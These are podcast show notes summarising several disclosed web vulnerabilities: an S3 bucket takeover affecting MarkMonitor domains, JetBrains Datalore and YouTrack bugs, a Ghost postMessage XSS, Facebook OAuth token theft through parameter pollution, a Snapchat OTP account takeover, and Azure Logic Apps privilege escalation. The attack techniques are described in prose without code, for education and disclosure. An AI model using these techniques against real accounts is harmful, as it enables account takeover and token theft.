Show Notes

79 - Takeover a Facebook, SnapChat or JetBrains account

MarkMonitor is domain management solution to protect corporate brands from things like internet counterfeiting, fraud, domain squatting, etc.

As such they own and register thousands of domain names. On August 28th the author’s automation for detecting unregistered S3 buckets started exploding, seeing hundreds of alerts in minutes. Their system registered over 800 buckets.

It turns out that that for a brief period all 60,000 of MarkMonitors parked domains were pointing to S3 buckets that didn’t exist. Giving attackers a period of time where they could claim the buckets and serve any content as the original domain.

Around an hour after this happened the domains started serving the correct content again. At first I didn’t think this was a huge issue because it was so short lived, would have to take a very well prepared attacker. That said, one easily automated step would be something like registered for a HTTPS certificate. Which could be quite damaging for of the victim domains and a targeted victim.

After finding an open redirect in Datalore’s endpoint for authenticating via JetBrains, the author dug into the auth process to see if it could be turned into an attack. They discovered that if an auth_url parameter was specified (which had to be a valid jetbrains subdomain), Datalore would send the user as as well as their JWT token to the given URL. This URL could include the very page which had this open redirect issue. By setting the auth_url to the open redirect page and passing in an attacker-controlled JetBrains JWT token, an attacker could get both the victim’s Datalore token and the attacker’s own JetBrains token sent to a malicious site.

Patch The open redirect was fixed, and the legacy authentication process was removed all together, instead relying on Oauth with JetBrains accounts as an identity provider.

When looking into the API internals of JetBrain’s YouTrack, the author discovered an undocumented endpoint for getting issue descriptions without any styling or markdown. This endpoint was not protected with role validation or any user authentication at all, likely because it’s only meant to be used internally. Any user could leak any issue’s description even if they didn’t have access to view it, including past reported (but potentially unfixed) security issues. The issue IDs look fairly guessable, so this bug would be easy to take advantage of.

Ghost 4.0.0 added a theme preview feature to the admin panel’s front-end. The preview page contains a message event listener for postMessage(), which will take any messages and directly write that message into the page contents. There’s no verification on the origin of the message, nor are there any frame options set or frame-ancestors set in the CSP.

As the page can be framed by any attacker controller page, and write any Javascript to be executed this provides an easy XSS vector to perform any action as a logged in admin.

Patch The patch here was to remove that code all together, though the blogpost authors point out that to properly fix this, the origin just needed to be checked.

tl;dr - The Oauth endpoint parses URL paramters redirect_uri and redirect_uri[0 (note the missing ]) as pointing to the same variable. Allowing the second to overwrite the first. The front-end however sees them as two distinct keys and so redirects the oauth token to the redirect_uri while the endpoint validates that the other value points to a whitelisted location

  • Facebook validates attempts to register to receive cross-origin messages without an origin by checking that the registered app owns the url. The problem is that actions such as the Oauth dialog allow you to specify any app_id so you can receive messages intended for other origins. Enabling capture of first-party oauth tokens.
  • Version information can be provided by the attacker and is simply prepended to the requested endpoint. Without validation an attacker can cause requests to go to unexpected endpoints like the graphql api.

Three vulnerabilities each receiving a $42,000 bounty and all dealing with message passing between Facebook games and apps hosted in an iframes on and controlled by attackers and the parent Facebook frame. The child frames use postMessage(...) to have the parent frame perform some action on behalf of the iframe.

Bug 1 - HTTP Parameter Pollution

One of the available actions is a jsonrpc action to call the showDialog method. Used to show a oauth login dialog to the end-user, and once the application has been authorized pass an access token back to the originating iframe. The parameters of this jsonrpc call are attacker controlled, and used to provide the various oauth parameters: redirect_uri and APP_ID are the two that matter here.

In the postMessage call, you also provide an origin parameter. This value is used as the targetOrigin when the parent frame responds.

Under normal circumstances you provide your applications APP_ID and origin and Facebook will craft an oauth request with the redirect_uri set to This is so it can catch the oauth reply and proxy it back to the iframe. This also means that the APP_ID must whitelist that redirect_uri with the origin domain, and the response containing the token Facebook captures will be sent in a message targeting specifically that domain.

The attack comes down to how the parameters are processed. It’ll simply append all the parameters provided along with those it generated (the redirect_uri) to the oauth URL. Not an issue on its own, but the bug is in the difference between redirect_uri=... and redirect_uri[0=... (notice the missing ]). In the JSON RPC call, these are two distinct keys, however to the oauth server both redirect_uri= and redirect_uri[0= get parsed as the the same key, redirect_uri. This enables an attacker to provide their own redirect uri value.

The attack here is to abuse a parameter pollution bug to create a desync between what redirect_uri is being used. this allows the attacker to use the APP_ID belonging to Instagram, and replace the generated redirect_uri with a valid Instagram redirect. When the server sees the request it sees the Instagram APP_ID and redirect_uri and thinks everything is okay. Replies in the browser okaying the redirect, in the browser it sees original redirect_uri as the valid one and redirects there with the token, providing the attacker Instagram’s token.

This is a great example of how subtle some of the bugs that deal with translating requests from one application to another can be.

Bug 2 - Undefined Origin

From the last bug we saw the url being used. That origin= part in the fragment being the targetOrigin used the response message. When it is missing from the url, it will check if a global origin was registered on the page and use that instead.

In order to register the global origin it will validate that the registered APP_ID has verified that it owns the origin provided before allowing it to receive messages on its behalf. This is to prevent an application from registering to receive messages targeting for example.

There are two issues that work together here:

  • Some first-party applications have whitelisted the arbiter with no origin as a valid redirect_uri
  • Even though the APP_ID and origin are checked when registering the global origin, the oauth request is not required to use the same APP_ID.

An attacker could register a global origin their application owns, the trigger an oauth dialog to a first-party application that accepts the blank arbiter to receive the token.

Bug 3 - Versions can’t be harmful

Part of generating the end URI is the PlatformDialogClient.getURI function. This will prepend the API version to the /dialog/oauth endpoint. The version can be passed in as part of the parameters in the original message, and is not validated in any way. This means you can trick the oauth dialog into making a request to other endpoints on the domain. The example used is to send a request to api/graphql/?... allowing an attacker to trigger graphql requests.

I’m not sure what the normal flow for a “One Tap Password” is but /scauth/otp/droid/logout can be used to retrieve OTP token in the response. Which can be passed to /scauth/otp/login along with the username to login.

The problem being that the logout endpoint accepts and trusts a user_id parameter. So an attacker can put in a victim’s user_id and retrieve an OTP password for the victim. Allowing them to login as that user.

tl;dr Some research examining how an attacker could abuse Azure Logical Apps access to to escalate their privileges.

  • The first being that sensitive information can be exposed with reader access, secrets attached to components, the run history, and past versions (and their components)
  • The second being a consideration of how some components can be reused for other purposes. An API connection included for one purpose might have more permissions than expected that a contributor would have access to.

Azure Logical Apps is Microsoft Azure’s Low-Code Development Platform. Used to automate some types of workflows without needing to write code. Low-code development is becoming increasingly popular, I wouldn’t call it popular but it has a definite presence.

This post isn’t covering any specific vulnerabilities but rather a series of potential attacks should you have access to a Logic App, how you might escelate to further access.

Reader Access - Essentially you have access to read the logic apps, one of the more basic permissions available. Can’t write or “contribute” to them. A reader can simply read out the raw definition of a logic application. This includes an associated inputs including potential secrets.

What’s a bit more interesting to me are that they call out the Run History and Versions areas as being accesisble also:

  • Run History will give you access to all the previous runs of the application, including any secrets that might have been printed during development builds, by default even sensitive actions will print their output.
  • Versions area giving you access to all the previous versions of the application, whether or not it was executed, including any hardcoded credentials that might have been included during early development.

Contributor access - Access to modify the Logic Applications. A much higher ask in terms of permissions for an attacker, the issue detailed is also a bit more debatable, as it does not violate the permission model.

The attack scenario described is through abusing access that might be granted for one use-case but also offer other functionality. Imagining the scenario where a developer can contribute within the the dev environment resource group, but an admin adds an application that for its own purposes establishes an API Connection to something over in the production environment.

An attacker could then reuse that API Connection created by the admin for their particular application and reuse it to access other features of the API that might not be intended by the admin.

The author admits this is a contrived example, but it is illustrative of the types of issues to be looking for should you have this level of access. The fundamental principal of the attack being that the permissions granted to any API connection or other application the logic apps interact with are permissions granted to all contributors.

The post ends with a brief discussion of the defensive side, some best practices that are similar to standard application development. Things like not hard-coding sensitive information but retrieving it from a secure service, and being aware of the permissions the API connections have.